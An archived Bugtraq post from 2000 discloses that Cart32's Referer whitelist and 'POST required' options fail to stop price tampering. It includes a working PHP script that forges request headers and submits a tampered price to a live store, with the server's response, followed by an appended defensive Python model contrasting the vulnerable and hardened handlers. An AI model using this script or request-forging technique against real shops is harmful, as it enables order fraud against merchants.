Bugtraq mailing list archives
Re: Another hole in Cart32
From: cdi () THEWEBMASTERS NET (CDI)
Date: Tue, 23 May 2000 14:05:03 -0700
On Mon, 22 May 2000, sert sert wrote:
> I attempted to contact the vendor earlier last month about resolving
> this problem and received the attached reply. They seem to be relying
> on the client to properly use the security options available in the
> package.
>
> John Scimone
> johnscimone () hotmail com
>
> [snip]
> What we did to help prevent this was add two fields into the Cart32
> administration. The most important one is called "Domains to accept
> orders". What you do with that is list all of the domains that can
> have pages on them. Usually you would list your domain name and your
> secure domain if it is different.
> Ex. www.cart32.com,cart32.com,secure.cart32.com
> [snip]
> The other field is called POST required. This means that a form must
> use Method=post and not method=get. Also that means links, which use
> the GET method, will not add to the cart."
>
> Mark Pilkenton
> Cart32 Technical Support
> (417) 865-1283
> support () cart32 com
> --END

This message is mainly for Mark and the Cart32 engineers - the BugTraq
faithful are already well aware that the above "security options" are a
complete joke and a total waste of time. Client-submitted data should
never even be -trusted-, let alone be the basis for your application's
data integrity.

Here - let's pull the security blanket off of Cart32 and show them the
cold, hard facts of life. This also shows that Cart32.com doesn't take
its own damn advice...

----begin cart32.phtml (a PHP exploit for Cart32 Stupidity)----
<?php
/*
   Caution - long lines ahead.

   Cart32.phtml
   Bypass lame "security" options by providing our own referer and
   tainted data via POST.
   cdi () thewebmasters net

   PostToHost()
   Heavily modified version of Rasmus' PostToHost function.
   It's generic enough to handle any method containing just about any
   data.
     $data:   urlencoded QUERY_STRING format
     $cookie: urlencoded cookie string format (name=value;name=value).
*/
function PostToHost($host="", $port="80", $method="POST", $path="",
                    $data="", $refer="", $client="", $cookie="")
{
    $fp = fsockopen($host, $port);
    if (!$fp) {
        echo "Failed to open port";
        exit;
    }

    // Build the raw request by hand so every header - including the
    // Referer the cart "checks" - is whatever we say it is.
    // (HTTP header lines end in CRLF; the original used bare LF, which
    // IIS tolerated.)
    fputs($fp, "$method $path HTTP/1.0\r\n");
    if ($cookie != "") {
        fputs($fp, "Cookie: $cookie\r\n");
    }
    if ($refer != "") {
        fputs($fp, "Referer: $refer\r\n");
    }
    if ($client != "") {
        fputs($fp, "User-Agent: $client\r\n");
    }
    if ($method == "POST") {
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: " . strlen($data) . "\r\n");
    }
    fputs($fp, "Connection: close\r\n\r\n");
    if ($method == "POST") {
        // Body length must match Content-length, so no trailing newline.
        fputs($fp, $data);
    }

    // Read the whole response (status line, headers and body).
    $results = "";
    while (!feof($fp)) {
        $results .= fgets($fp, 1024);
    }
    fclose($fp);
    return $results;
}

// Whee, now all we need to do is set up the data
$host   = 'www.cart32.com';
$port   = 80;
$method = "POST";
$path   = '/cgi-bin/cart32.exe/justsocks-AddItem';
$refer  = 'www.IGuessYouDontTakeYourOwnAdvice.com';
// And even if they did, we could set the Referer to match
// anything we wanted.
$client = 'CDI Spoof (v1.0)';
$cookie = "";

// Real price of this product was $6.99
$data = 'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite';

// And now call the function
$raw = PostToHost($host, $port, $method, $path, $data, $refer, $client, $cookie);

print "<PRE>\n\n";
print " Host: $host\n Port: [$port]\n Method: [$method]\n Path: [$path]\n";
print " Referer: [$refer]\n Client: [$client]\n Cookie: [$cookie]\n";
print " Data: [$data]\n";
print "</PRE>\n";
print "<P>Results of operation:<BR><HR NOSHADE><P>\n";
print "$raw\n";
?>

The JustSocks site is real and is hosted by Cart32.com - the data sent
above resulted in the following: (html removed)

 Host: www.cart32.com
 Port: [80]
 Method: [POST]
 Path: [/cgi-bin/cart32.exe/justsocks-AddItem]
 Referer: [www.IGuessYouDontTakeYourOwnAdvice.com]
 Client: [CDI Spoof (v1.0)]
 Cookie: []
 Data: [Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite]

Results of operation:

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 23 May 2000 20:54:04 GMT
Content-type: text/html
Set-Cookie: Cart32-JUSTSOCKS=.3478662; path=/; expires=Thursday, 25-May-2000 01:01:01 GMT

Added quantity 5 of Wigwam Triathlete Ultra-Lite for $1,000.56 each

CDI
____________________________________
The Web Master's Net
http://www.thewebmasters.net/
Today's Excuse: poor power conditioning
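The point of the post is that a Referer whitelist and a "POST required" flag are checks on values the attacker writes, so they cannot protect a price the attacker also writes. The following is an added example, not code from the post or from Cart32: a small model of an AddItem handler that applies the two vendor options and then trusts the submitted Price, beside a version that resolves PartNo against a server-side catalogue and ignores Price altogether. The catalogue, the accepted-domain set and the Referer values are constructed for the example; the $6.99 real price and the tampered $1,000.56 are the figures from the post.

```python
"""
Model of Cart32's "Domains to accept orders" + "POST required" options versus
a server-side price lookup. Added example; not Cart32 code. The catalogue and
request values below are constructed (PartNo/Item/Price come from the post).
"""
from decimal import Decimal
from urllib.parse import parse_qs, urlsplit

# Assumed server-side catalogue keyed by PartNo. This, not the form, is
# where the price must come from.
CATALOG = {"F6092": ("Wigwam Triathlete Ultra-Lite", Decimal("6.99"))}

# The vendor's example "Domains to accept orders" list.
ACCEPTED_DOMAINS = {"www.cart32.com", "cart32.com", "secure.cart32.com"}

# Constructed body with the same fields CDI posted (Price tampered to 1000.56).
TAMPERED_BODY = (
    "Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5"
    "&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite"
)


def referer_host(referer):
    """Host part of a Referer header, lower-cased; '' when absent/unparsable."""
    if not referer:
        return ""
    if "://" not in referer:
        referer = "http://" + referer
    return (urlsplit(referer).hostname or "").lower()


def vendor_add_item(method, headers, body):
    """Cart32-style handler: gate on method and Referer, then trust Price."""
    if method != "POST":
        return {"ok": False, "why": "POST required"}
    if referer_host(headers.get("Referer", "")) not in ACCEPTED_DOMAINS:
        return {"ok": False, "why": "referer domain not accepted"}
    form = parse_qs(body, keep_blank_values=True)
    # The actual bug: unit price is read from the client's form data.
    return {
        "ok": True,
        "item": form["Item"][0],
        "qty": int(form["Qty"][0]),
        "each": Decimal(form["Price"][0]),
    }


def hardened_add_item(method, headers, body):
    """Same form, but PartNo is resolved server-side and Price/Item are ignored.
    The Referer header plays no part at all."""
    if method != "POST":
        return {"ok": False, "why": "POST required"}
    form = parse_qs(body, keep_blank_values=True)
    part = form.get("PartNo", [""])[0]
    if part not in CATALOG:
        return {"ok": False, "why": "unknown PartNo"}
    try:
        qty = int(form.get("Qty", ["0"])[0])
    except ValueError:
        qty = 0
    if not 1 <= qty <= 99:  # assumed per-line quantity limit
        return {"ok": False, "why": "bad Qty"}
    name, price = CATALOG[part]
    return {"ok": True, "item": name, "qty": qty, "each": price}


def demo():
    """Run the tampered request through both handlers with two Referers."""
    bogus = {"Referer": "www.IGuessYouDontTakeYourOwnAdvice.com"}
    # Anyone building the request by hand just sets Referer to a listed domain.
    spoofed = {"Referer": "http://www.cart32.com/justsocks/order.htm"}
    return {
        "vendor_bogus_referer": vendor_add_item("POST", bogus, TAMPERED_BODY),
        "vendor_spoofed_referer": vendor_add_item("POST", spoofed, TAMPERED_BODY),
        "hardened": hardened_add_item("POST", spoofed, TAMPERED_BODY),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

With the domain option switched on, the vendor handler rejects CDI's joke Referer but accepts the identical body at $1,000.56 the moment the Referer is changed to one of the listed domains; the hardened handler charges $6.99 for part F6092 whatever the form or the headers say.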
Current thread:
- Re: Another hole in Cart32 sert sert (May 22)
- Re: Another hole in Cart32 CDI (May 23)
- <Possible follow-ups>
- Re: Another hole in Cart32 Clover Andrew (May 23)
- Re: Another hole in Cart32 Justin King (May 24)